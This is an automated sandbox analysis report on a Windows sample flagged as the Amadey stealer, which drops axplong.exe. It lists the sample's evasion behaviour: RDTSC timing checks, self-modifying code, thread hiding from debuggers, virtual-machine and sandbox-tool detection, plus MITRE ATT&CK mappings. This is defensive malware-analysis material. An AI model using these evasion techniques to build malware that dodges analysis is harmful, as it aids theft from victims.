Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60084 second address: 4B600F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 adc ch, FFFFFFDEh 0x00000016 jmp 00007F3A9502B5F9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3A9502B5F0h 0x00000022 xor ah, FFFFFFD8h 0x00000025 jmp 00007F3A9502B5EBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B600F7 second address: 4B600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B600FD second address: 4B60101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60101 second address: 4B6013C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD407Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F3A94CD4089h 0x00000011 xchg eax, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F3A94CD407Dh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B6013C second address: 4B60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60158 second address: 4B6015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B6015C second address: 4B6016F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B6016F second address: 4B60187 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4084h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60187 second address: 4B6018B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B6018B second address: 4B601B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3A94CD407Eh 0x0000000e xchg eax, ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3A94CD407Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B601B1 second address: 4B601B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B601B7 second address: 4B601BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B601BD second address: 4B601C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B601C1 second address: 4B601E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov eax, edx 0x00000010 call 00007F3A94CD407Dh 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B601E0 second address: 4B60246 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5ECh 0x00000008 mov ecx, 643002E1h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, esi 0x00000011 jmp 00007F3A9502B5ECh 0x00000016 push eax 0x00000017 pushad 0x00000018 movsx edx, ax 0x0000001b popad 0x0000001c xchg eax, esi 0x0000001d jmp 00007F3A9502B5EFh 0x00000022 mov esi, dword ptr [ebp+08h] 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A9502B5EEh 0x0000002e jmp 00007F3A9502B5F5h 0x00000033 popfd 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60246 second address: 4B60263 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3A94CD4087h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60263 second address: 4B60286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ecx 0x00000008 jmp 00007F3A9502B5F2h 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B60286 second address: 4B6028C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B603A4 second address: 4B603F3 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 2ECFB96Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a mov dh, ah 0x0000000c pushfd 0x0000000d jmp 00007F3A9502B5F7h 0x00000012 and cx, 71AEh 0x00000017 jmp 00007F3A9502B5F9h 0x0000001c popfd 0x0000001d popad 0x0000001e popad 0x0000001f test byte ptr [esi+48h], 00000001h 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B603F3 second address: 4B603F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B603F9 second address: 4B603FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50716 second address: 4B5071C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B5071C second address: 4B50720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50720 second address: 4B50787 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d movzx esi, di 0x00000010 mov dh, 1Ah 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F3A94CD4083h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F3A94CD4086h 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F3A94CD4087h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50787 second address: 4B507CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov bx, 5E46h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c and esp, FFFFFFF8h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5F9h 0x00000018 xor si, 77A6h 0x0000001d jmp 00007F3A9502B5F1h 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B507CA second address: 4B50823 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F3A94CD407Ch 0x0000000c add eax, 1F97B548h 0x00000012 jmp 00007F3A94CD407Bh 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F3A94CD4084h 0x00000021 adc cx, 77A8h 0x00000026 jmp 00007F3A94CD407Bh 0x0000002b popfd 0x0000002c movzx eax, bx 0x0000002f popad 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50823 second address: 4B50827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50827 second address: 4B5082D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B5082D second address: 4B50873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 29D453ABh 0x00000008 pushfd 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e sub eax, 59ADE538h 0x00000014 jmp 00007F3A9502B5EBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3A9502B5F5h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50873 second address: 4B50883 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD407Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50883 second address: 4B50892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50892 second address: 4B50896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50896 second address: 4B5089A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B5089A second address: 4B508A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B508A0 second address: 4B5094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], esi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5EEh 0x00000013 xor si, 6458h 0x00000018 jmp 00007F3A9502B5EBh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F3A9502B5F8h 0x00000024 sub ax, EEB8h 0x00000029 jmp 00007F3A9502B5EBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov esi, dword ptr [ebp+08h] 0x00000033 pushad 0x00000034 mov al, 23h 0x00000036 jmp 00007F3A9502B5F1h 0x0000003b popad 0x0000003c sub ebx, ebx 0x0000003e jmp 00007F3A9502B5F7h 0x00000043 test esi, esi 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F3A9502B5F5h 0x0000004c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B5094D second address: 4B509DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov ecx, edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F3B07529AADh 0x00000010 pushad 0x00000011 push edi 0x00000012 call 00007F3A94CD4080h 0x00000017 pop eax 0x00000018 pop ebx 0x00000019 mov dx, ax 0x0000001c popad 0x0000001d cmp dword ptr [esi+08h], DDEEDDEEh 0x00000024 pushad 0x00000025 mov edi, ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F3A94CD4082h 0x0000002e add ecx, 16C2DF68h 0x00000034 jmp 00007F3A94CD407Bh 0x00000039 popfd 0x0000003a jmp 00007F3A94CD4088h 0x0000003f popad 0x00000040 popad 0x00000041 mov ecx, esi 0x00000043 pushad 0x00000044 mov esi, 1B78B39Dh 0x00000049 mov edx, eax 0x0000004b popad 0x0000004c je 00007F3B07529A4Fh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F3A94CD407Bh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B509DD second address: 4B509E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B509E4 second address: 4B50A00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test byte ptr [77436968h], 00000002h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A94CD407Ch 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	RDTSC instruction interceptor: First address: 4B50A00 second address: 4B50A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F3B07880F8Dh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Special instruction interceptor: First address: 1CEA2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Special instruction interceptor: First address: 378365 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Special instruction interceptor: First address: 1CEA22 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Special instruction interceptor: First address: 3F7884 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: C4EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: DF8365 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: C4EA22 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Special instruction interceptor: First address: E77884 instructions caused by: Self-modifying code

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Code function: 1_2_04BD02BD rdtsc

1_2_04BD02BD

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Thread delayed: delay time: 180000

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 445	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 2811	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 2914	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 966	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window / User API: threadDelayed 601	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5780	Thread sleep time: -128064s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804	Thread sleep time: -106053s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656	Thread sleep count: 445 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6656	Thread sleep time: -13350000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6992	Thread sleep time: -720000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4368	Thread sleep time: -104052s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460	Thread sleep count: 2811 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460	Thread sleep time: -5624811s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356	Thread sleep count: 2914 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356	Thread sleep time: -5830914s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356	Thread sleep count: 966 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5356	Thread sleep time: -1932966s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460	Thread sleep count: 601 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4460	Thread sleep time: -1202601s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000009.00000002.3364157249.000000000129B000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000009.00000002.3364157249.000000000127E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: 9ICG2PuZbG.exe, 00000001.00000002.2156468731.000000000034E000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2186759224.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2186680442.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: axplong.exe, 00000009.00000002.3364157249.0000000001268000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@C)

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Code function: 1_2_04BD02BD rdtsc

1_2_04BD02BD

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C1645B mov eax, dword ptr fs:[00000030h]		9_2_00C1645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 9_2_00C1A1C2 mov eax, dword ptr fs:[00000030h]		9_2_00C1A1C2

Source: C:\Users\user\Desktop\9ICG2PuZbG.exe

Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"

Jump to behavior

Source: axplong.exe, axplong.exe, 00000009.00000002.3362669493.0000000000DCE000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: ,cDProgram Manager

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_00BFD312 cpuid

9_2_00BFD312

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_00BFCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,

9_2_00BFCB1A

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 9_2_00BE65B0 LookupAccountNameA,

9_2_00BE65B0

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 1.2.9ICG2PuZbG.exe.160000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.axplong.exe.be0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2156374942.0000000000161000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3362421453.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.2116109167.00000000049E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2723052390.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2186588517.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2145696772.0000000004EA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2145827348.00000000053B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2186678248.0000000000BE1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
